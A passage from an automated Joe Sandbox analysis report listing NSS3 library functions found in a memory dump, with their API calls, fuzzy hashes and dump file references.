Instruction ID: cb8e6aef3cb7f0371d4c7f7f5e932d7db2e839ddaf2231cbba0e6fd225d5917e
Opcode Fuzzy Hash: 729363541615c134ab4f378c722ccc822584503d62a4c33f35c8629b2ec2c23b
Instruction Fuzzy Hash: 69212631E00635ABD722AF75DA4879A73B8BF0576CF140234DD0867A42E734E964CBD0

Function 6C733F50 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6C733440: PK11_GetAllTokens.NSS3 ref: 6C733481
Part of subcall function 6C733440: PR_SetError.NSS3(00000000,00000000), ref: 6C7334A3
Part of subcall function 6C733440: TlsGetValue.KERNEL32 ref: 6C73352E
Part of subcall function 6C733440: EnterCriticalSection.KERNEL32(?), ref: 6C733542
Part of subcall function 6C733440: PR_Unlock.NSS3(?), ref: 6C73355B

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C71E80C,00000000,00000000,?,?,?,?,6C728C5B,-00000001), ref: 6C733FA1
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C71E80C,00000000,00000000,?,?,?,?,6C728C5B,-00000001), ref: 6C733FBA
PR_Unlock.NSS3(?,00000000,00000000,00000000,?,6C71E80C,00000000,00000000,?,?,?,?,6C728C5B,-00000001), ref: 6C733FFE
PR_SetError.NSS3 ref: 6C73401A

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue$K11_Tokens
String ID:
API String ID: 3021504977-0
Opcode ID: 302890e131749c7268e0956f7bc8e8b5a79d8a610b4ecc524ca0f05c0471e853
Instruction ID: b139f8be62ae6aa7a2a08e4cfd918cbb16547eed1fbf5cfd431a1f002dec757f
Opcode Fuzzy Hash: 302890e131749c7268e0956f7bc8e8b5a79d8a610b4ecc524ca0f05c0471e853
Instruction Fuzzy Hash: C13180706047148FD710AF69D68866EBBF0FF84318F11593ED99987701EB35E885CB91

Function 6C724FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C72B60F,00000000), ref: 6C725003
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C72B60F,00000000), ref: 6C72501C
PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C72B60F,00000000), ref: 6C72504B
free.MOZGLUE(?,00000000,00000000,00000000,?,6C72B60F,00000000), ref: 6C725064

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 1112172411-0
Opcode ID: e05ed08e2c60234428d5555f7c6d06235f03a3d484951d2f45a48ad508ec132f
Instruction ID: 9d25b6b1477ec7e271d46eb96c46c6508c1d2555b831a8a230e6c934cbe3a1ec
Opcode Fuzzy Hash: e05ed08e2c60234428d5555f7c6d06235f03a3d484951d2f45a48ad508ec132f
Instruction Fuzzy Hash: A53105B0A056068FDB50EF68D58496AFBF4FF48308B158A29D85997705E734E890CBD1

Function 6C749F80 Relevance: 6.1, APIs: 4, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6C74A71A,FFFFFFFF,?,?), ref: 6C749FAB

Part of subcall function 6C7414C0: TlsGetValue.KERNEL32 ref: 6C7414E0
Part of subcall function 6C7414C0: EnterCriticalSection.KERNEL32 ref: 6C7414F5
Part of subcall function 6C7414C0: PR_Unlock.NSS3 ref: 6C74150D

PORT_ArenaGrow_Util.NSS3(?,?,?,00000000,6C74A71A,6C74A71A,00000000), ref: 6C749FD9

Part of subcall function 6C741340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C6E895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6DF599,?,00000000), ref: 6C74136A
Part of subcall function 6C741340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C6E895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6DF599,?,00000000), ref: 6C74137E
Part of subcall function 6C741340: PL_ArenaGrow.NSS3(?,6C6DF599,?,00000000,?,6C6E895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6DF599,?), ref: 6C7413CF
Part of subcall function 6C741340: PR_Unlock.NSS3(?,?,6C6E895A,00000000,?,00000000,?,00000000,?,00000000,?,6C6DF599,?,00000000), ref: 6C74145C

PORT_ArenaAlloc_Util.NSS3(?,00000008,6C74A71A,6C74A71A,00000000), ref: 6C74A009
PR_SetError.NSS3(FFFFE013,00000000,6C74A71A,6C74A71A,00000000), ref: 6C74A045

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Arena$Util$CriticalEnterSectionUnlockValue$Alloc_ErrorGrowGrow_Mark_
String ID:
API String ID: 3535121653-0
Opcode ID: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
Instruction ID: 4333e18a64065041e84337fd3fd0c51ae86f49059ec86c54a1b05bcff9fe98b7
Opcode Fuzzy Hash: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
Instruction Fuzzy Hash: C321C2B4600206ABF7009F15DD44F66B7A9FB8036DF10C138D8298BB91FB75E824CB90

Function 6C752DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C752E08

Part of subcall function 6C7414C0: TlsGetValue.KERNEL32 ref: 6C7414E0
Part of subcall function 6C7414C0: EnterCriticalSection.KERNEL32 ref: 6C7414F5
Part of subcall function 6C7414C0: PR_Unlock.NSS3 ref: 6C74150D

PORT_NewArena_Util.NSS3(00000400), ref: 6C752E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C752E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C752E95

Part of subcall function 6C741200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C6E88A4,00000000,00000000), ref: 6C741228
Part of subcall function 6C741200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C741238
Part of subcall function 6C741200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C6E88A4,00000000,00000000), ref: 6C74124B
Part of subcall function 6C741200: PR_CallOnce.NSS3(6C842AA4,6C7412D0,00000000,00000000,00000000,?,6C6E88A4,00000000,00000000), ref: 6C74125D
Part of subcall function 6C741200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C74126F
Part of subcall function 6C741200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C741280
Part of subcall function 6C741200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C74128E
Part of subcall function 6C741200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C74129A
Part of subcall function 6C741200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C7412A1

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: ca59eb71ed7e823f71734849277f8b9c80e3fa246618c4193d16b4b17b369d03
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: 5421D4B1E003454BE700DF549E4CBAA3768AFA130CF614279DD085B752FBB1E6A8C292

Function 6C70ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C70ACC2

Part of subcall function 6C6E2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C6E2F0A
Part of subcall function 6C6E2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C6E2F1D

Part of subcall function 6C6E2AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C6E0A1B,00000000), ref: 6C6E2AF0
Part of subcall function 6C6E2AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6E2B11

CERT_DestroyCertList.NSS3(00000000), ref: 6C70AD5E

Part of subcall function 6C7257D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C6EB41E,00000000,00000000,?,00000000,?,6C6EB41E,00000000,00000000,00000001,?), ref: 6C7257E0
Part of subcall function 6C7257D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C725843

CERT_DestroyCertList.NSS3(?), ref: 6C70AD36

Part of subcall function 6C6E2F50: CERT_DestroyCertificate.NSS3(?), ref: 6C6E2F65
Part of subcall function 6C6E2F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6E2F83

free.MOZGLUE(?), ref: 6C70AD4F

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: 2e53beaf988b07907019f13c00044396bf532cb5e9a1d3461fe6096c2756be7c
Instruction ID: 146b4117469cc31441d921fe76ce2dd66fa8063c48d6869051771e08b809bf34
Opcode Fuzzy Hash: 2e53beaf988b07907019f13c00044396bf532cb5e9a1d3461fe6096c2756be7c
Instruction Fuzzy Hash: 5021C6F1E011148BEB10DF64D90A5EE77F4AF09218F054079D814B7701FB31AA49CBE5

Function 6C733C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C733C9E
EnterCriticalSection.KERNEL32(?), ref: 6C733CAE
PR_Unlock.NSS3(?), ref: 6C733CEA
PR_SetError.NSS3(00000000,00000000), ref: 6C733D02

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 90a8c60ee3e3309315218c21fc4ef0a9bb6217fdebca1891a4f32168aa3240d6
Instruction ID: fa04dc9bc13d891a5c4c3e07309491528cfa99fc9f5b974983e0f05070506fc6
Opcode Fuzzy Hash: 90a8c60ee3e3309315218c21fc4ef0a9bb6217fdebca1891a4f32168aa3240d6
Instruction Fuzzy Hash: EB11E179A00214AFDB50AF24E849E9A37B8EF4936CF159570ED088B712E730ED51CBE0

Function 6C73ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C73F0AD,6C73F150,?,6C73F150,?,?,?), ref: 6C73ECBA

Part of subcall function 6C740FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6E87ED,00000800,6C6DEF74,00000000), ref: 6C741000
Part of subcall function 6C740FF0: PR_NewLock.NSS3(?,00000800,6C6DEF74,00000000), ref: 6C741016
Part of subcall function 6C740FF0: PL_InitArenaPool.NSS3(00000000,security,6C6E87ED,00000008,?,00000800,6C6DEF74,00000000), ref: 6C74102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C73ECD1

Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C7410F3
Part of subcall function 6C7410C0: EnterCriticalSection.KERNEL32(?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74110C
Part of subcall function 6C7410C0: PL_ArenaAllocate.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741141
Part of subcall function 6C7410C0: PR_Unlock.NSS3(?,?,?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C741182
Part of subcall function 6C7410C0: TlsGetValue.KERNEL32(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C73ED02

Part of subcall function 6C7410C0: PL_ArenaAllocate.NSS3(?,6C6E8802,00000000,00000008,?,6C6DEF74,00000000), ref: 6C74116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C73ED5A

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: bb566964f8dbd4eec63e6a0f6ab23cd73cbdceece9c997b7b2ee40d6f1b4f35b
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: 9C21D4B1A107529BE700CF25DA49B52B7E4BFA4308F15D225E81C87662FB70E994C7D0

Function 6C76EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C757FFA,?,6C759767,?,8B7874C0,0000A48E), ref: 6C76EDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C757FFA,?,6C759767,?,8B7874C0,0000A48E), ref: 6C76EDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6C757FFA,?,6C759767,?,8B7874C0,0000A48E), ref: 6C76EE14

Part of subcall function 6C740BE0: malloc.MOZGLUE(6C738D2D,?,00000000,?), ref: 6C740BF8
Part of subcall function 6C740BE0: TlsGetValue.KERNEL32(6C738D2D,?,00000000,?), ref: 6C740C15

memcpy.VCRUNTIME140(?,?,6C759767,00000000,00000000,6C757FFA,?,6C759767,?,8B7874C0,0000A48E), ref: 6C76EE33

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: cadf60f4e22912fab76885f790bfefc7bb31ac003613f76d7478f96ba2bdedce
Instruction ID: 8a418da250e7bcb314d655500980be3e1ebd7c957371219c536971e777366bbe
Opcode Fuzzy Hash: cadf60f4e22912fab76885f790bfefc7bb31ac003613f76d7478f96ba2bdedce
Instruction Fuzzy Hash: 3A11A0B1A0070AABEB109E66DE88B46B3ACEB0035DF244535ED1986E41E330E464C7F1

Function 6C6EDFA0 Relevance: 6.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C7006A0: TlsGetValue.KERNEL32 ref: 6C7006C2
Part of subcall function 6C7006A0: EnterCriticalSection.KERNEL32(?), ref: 6C7006D6
Part of subcall function 6C7006A0: PR_Unlock.NSS3 ref: 6C7006EB

CERT_NewCertList.NSS3 ref: 6C6EDFBF
CERT_AddCertToListTail.NSS3(00000000,?), ref: 6C6EDFDB
CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C6EDFFA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6EE029

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Cert$List$CriticalEnterErrorFindIssuerSectionTailUnlockValue
String ID:
API String ID: 3183882470-0
Opcode ID: 405f845adc6167fc33325065f84957d7f9857c790e95633a98274b85cba4a1ef
Instruction ID: 612d5b0490940b759f61ea73951e0f6cd7bf56f485bcd31d1143c5a7505c946f
Opcode Fuzzy Hash: 405f845adc6167fc33325065f84957d7f9857c790e95633a98274b85cba4a1ef
Instruction Fuzzy Hash: FE116F71A0E2066BDB104EA95C08FEB76B8AB8D35CF040536E918C7701F732C82497E9

Function 6C708DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C708DE7
EnterCriticalSection.KERNEL32 ref: 6C708DFC
PR_Unlock.NSS3 ref: 6C708E2D
PR_SetError.NSS3 ref: 6C708E49

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: c1aa7f0666c66f2a5d10c8c46c22163118dc098c1ad76f214dfb5747e251f658
Instruction ID: a781a1f1ddc50b7438b00dc486c8e3c08998f10957727195cd7a16c108ba93d3
Opcode Fuzzy Hash: c1aa7f0666c66f2a5d10c8c46c22163118dc098c1ad76f214dfb5747e251f658
Instruction Fuzzy Hash: AE118FB16056109BD710BF78D588559BBF4FF45358F014A3ADC8897701E730E854CBD1

Function 6C78AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C775F17,?,?,?,?,?,?,?,?,6C77AAD4), ref: 6C78AC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C775F17,?,?,?,?,?,?,?,?,6C77AAD4), ref: 6C78ACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C77AAD4), ref: 6C78ACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C77AAD4), ref: 6C78ACDB

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 97874294c9f072bcc64fb07533389070c10f7bf43c07a9a616e40980639cec86
Instruction ID: bcb23482c0e6fb1d3863fddc686e3f11814811a8c77f35c43ac53f9c129865fa
Opcode Fuzzy Hash: 97874294c9f072bcc64fb07533389070c10f7bf43c07a9a616e40980639cec86
Instruction Fuzzy Hash: 04015EB1602B159BE760DF6ADA08753B7E8BF00669B104839D95EC3E40E731F054CBD1

Function 6C6F1DD0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

CERT_DestroyCertificate.NSS3(?), ref: 6C6F1DFB

Part of subcall function 6C6E95B0: TlsGetValue.KERNEL32(00000000,?,6C7000D2,00000000), ref: 6C6E95D2
Part of subcall function 6C6E95B0: EnterCriticalSection.KERNEL32(?,?,?,6C7000D2,00000000), ref: 6C6E95E7
Part of subcall function 6C6E95B0: PR_Unlock.NSS3(?,?,?,?,6C7000D2,00000000), ref: 6C6E9605

PR_EnterMonitor.NSS3 ref: 6C6F1E09

Part of subcall function 6C7A9090: TlsGetValue.KERNEL32 ref: 6C7A90AB
Part of subcall function 6C7A9090: TlsGetValue.KERNEL32 ref: 6C7A90C9
Part of subcall function 6C7A9090: EnterCriticalSection.KERNEL32 ref: 6C7A90E5
Part of subcall function 6C7A9090: TlsGetValue.KERNEL32 ref: 6C7A9116
Part of subcall function 6C7A9090: LeaveCriticalSection.KERNEL32 ref: 6C7A913F

Part of subcall function 6C6EE190: PR_EnterMonitor.NSS3(?,?,6C6EE175), ref: 6C6EE19C
Part of subcall function 6C6EE190: PR_EnterMonitor.NSS3(6C6EE175), ref: 6C6EE1AA
Part of subcall function 6C6EE190: PR_ExitMonitor.NSS3 ref: 6C6EE208
Part of subcall function 6C6EE190: PL_HashTableRemove.NSS3(?), ref: 6C6EE219
Part of subcall function 6C6EE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6EE231
Part of subcall function 6C6EE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6EE249
Part of subcall function 6C6EE190: PR_ExitMonitor.NSS3 ref: 6C6EE257

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6F1E37
PR_ExitMonitor.NSS3 ref: 6C6F1E4A

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
String ID:
API String ID: 499896158-0
Opcode ID: 7847a5e3ea282c79638edf14b5ec94cda80f8895472c0b80f2bbb87d65c5ff5f
Instruction ID: 8beb85f9077e870a564eaea19ccb8cdb86ac562e7d9fb5f53fe27d0852d22839
Opcode Fuzzy Hash: 7847a5e3ea282c79638edf14b5ec94cda80f8895472c0b80f2bbb87d65c5ff5f
Instruction Fuzzy Hash: EF0147B1B0015097EB105B6AEC04F837775AB5278CF114031E438A7B91E331E827CBC9

Function 6C6F1D50 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6F1D75
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C6F1D89
